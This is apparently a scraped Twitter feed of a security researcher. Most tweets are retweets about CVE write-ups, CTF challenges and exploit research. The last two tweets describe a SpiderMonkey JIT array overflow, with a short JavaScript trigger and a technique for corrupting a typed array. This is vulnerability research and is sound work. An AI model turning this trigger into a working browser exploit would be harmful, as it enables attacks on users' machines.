Vignesh S Rao

@sherl0ck__

Cyber Security Enthusiast | CTFer | Pwning | Forensics

Joined December 2017

Tweets

  1. Pinned Tweet
    19 Aug 2019
  2. Retweeted
    17 hours ago

    just found that this writeup for CVE-2019-9793, a range analysis bug in Spidermonkey found by and analyzed by me is now unrestricted: I thought it was a cool bug, although unfortunately Spectre mitigations prevented exploitation as far as I know

  3. Retweeted
    4 Feb

    2019 was a great year for Exodus and 2020 is going to be even better. We're expecting to expand the team on a variety of fronts. If interested visit and email careers@exodusintel.com with a cv and references published work

  4. Retweeted
    24 Jan

    🎉 it's Chinese New Year's Eve! so we're going to release some new challenges! 8 new challenges will be unlocked on UTC 2019-01-26 04:00

  5. Retweeted
    22 Jan

    Our member found yet another bug in QEMU's network backend and was assigned with CVE-2020-7039. For more info, checkout:

  6. Retweeted
    4 Jan

    Introducing MemLabs - Educational, CTF-styled labs for individuals interested in Memory Forensics, is now released. Link: Author:

  7. Retweeted
    6 Dec 2019

    Here is an exploit chain I wrote for Firefox that gets RCE via CVE-2019-9810 and escape the sandbox with CVE-2019-11708/CVE-2019-9810. Once compromised, it drops a payload and injects privileged JS code in already/newly created tabs.

  8. Retweeted
    30 Nov 2019

    Don't miss the episode later today at 17:00 UTC: . We have a great competitor line-up consisting of: peace-maker, NotDeGhost, and Who will be the first one to solve today's tricky pwnable challenge?

  9. Retweeted
    27 Nov 2019

    Solving binary-only CTF challenges with honggfuzz and qemu binary instrumentation -

  10. Retweeted
    21 Nov 2019

    Blog post on CVE-2019-2215, the Android binder bug that was exploited in-the-wild and affected most Android devices manufactured prior to Fall 2018.

  11. Retweeted
    27 Oct 2019

    I just upgraded to Ubuntu 19.10 and noticed that they enable -fcf-protection by default in gcc which adds an endbr64 instruction in every function prologue. This seems strange for two reasons:

  12. Retweeted
    27 Oct 2019

    Today is the 3rd anniversary of "Attacking JavaScript Engines". Not a lot has changed, but I tried to briefly summarize the things that did: It's been a few months since my last interactions with JSC though, so any corrections/additions are very welcome :)

  13. Retweeted
    27 Oct 2019

    Our members & did a small research in which they created a fuzzing tool that found new functions to bypass PHP disable_functions & can also tell how strong your disable_functions is. Full report: Tool:

  14. Retweeted
    24 Oct 2019

    Of course we also had a bunch of local teams playing. While attending the conference they achieved some quite competitive results. Our local winners are: 1. 2. 3. Great job! See you at the award ceremony at 5:00pm

  15. Retweeted
    14 Oct 2019

    Uploaded all my challenges for HITCON CTF Quals 2019! Include the src/sol of funny misc chals, a RE challenge written in Crystal, and the hardest challenges, PoE, that needs you to exploit the user-space program, the Linux kernel module, and hack QEMU!

  16. Retweeted
    13 Oct 2019

    My exploit for my challenges at HITCON CTF 2019 Qual Hope everyone can learn more from our CTF.

  17. Retweeted
    8 Oct 2019
  18. Retweeted

    Finally finished the navarint challenge at , written by !! It has eluded solves from not one, but two competitions now! Kinda sad 😰 for problem writer... Here's my exploit file for the challenge:

  19. Retweeted
    29 Sep 2019

    HACKED! Verbose booting iPhone X looks pretty cool. Starting in DFU Mode, it took 2 seconds to jailbreak it with checkm8, and then I made it automatically boot from NAND with patches for verbose boot. Latest iOS 13.1.1, and no need to upload any images. Thanks

  20. 22 Sep 2019

    Simple 2 element overflow in Array, as initialized length is compared with (initialized length + 2) when jit'ed. Use this to overwrite the shape and group for the following object (say a Uint8Array) to that of Uint32Array, thus attaining a larger overflow in a typed array.

  21. 22 Sep 2019

    blah = new Array()
    blah.push(new Array(1.1,1.1))
    blah.push(new Uint32Array(0x10))
    function trigger(a1,a2){
      blah[0][a1]=1.337;
      for (let i=0; i<100000; i++){}
    }
    for(var i=0;i<100;i++) trigger(0)
    trigger(2)
    blah[1]
